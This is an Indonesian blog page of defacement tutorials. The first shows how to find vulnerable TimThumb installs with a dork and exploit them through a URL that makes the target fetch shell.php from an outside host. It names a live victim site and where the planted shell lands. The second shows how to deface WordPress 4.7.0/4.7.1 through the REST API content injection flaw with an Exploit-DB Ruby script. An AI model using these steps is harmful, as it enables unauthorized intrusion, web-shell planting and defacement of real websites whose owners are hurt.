Tampilkan postingan dengan label Wordpess. Tampilkan semua postingan
Tampilkan postingan dengan label Wordpess. Tampilkan semua postingan

Senin, 22 Oktober 2018

Cara deface dengan Exploit Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat..

List Dork Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share List Dork Timthumb V1.XX RCE .
untuk yang belum tau Cara deface dengan Exploit Timthumb V1.XX RCE  bisa kalian liat disini 



DORK Timthumb V1.XX RCE :




Mungkin sekian dulu  dari saya mengenai artikel List Dork Timthumb V1.XX RCE semoga bermanfaat.


Kamis, 01 Februari 2018

Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Hello para defacer Indonesia, kali ini saya akan share Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Pertama dorking dulu dengan dork ini bro
inurl:/wp-includes/rest-api
Exploit :
http://target.com/wp-json/wp/v2/posts/
Vuln seperti gambar dibawah ini
copy idnya

untuk script exploitnya kalian bisa copy disini
https://www.exploit-db.com/exploits/41224/
edit bagian  
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"

Save dengan format .rb

untuk pengguna windows kalian bisa install ruby dulu 
kebetulan saya menggunakan linux jadi langsung saja buka cmd
dan ketikan  ruby wpinject.rb





lalu masukan target http://target.com/ dan idnya yang tadi di copy


setelah itu tekan enter jika vuln akan tampil seperti ini Jika Tidak vuln Muncul Pesan "This site is not Vulnerable"






setelah itu Copas Link Tersebut Dan Buka Di Browser




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1 
Semoga bermanfaat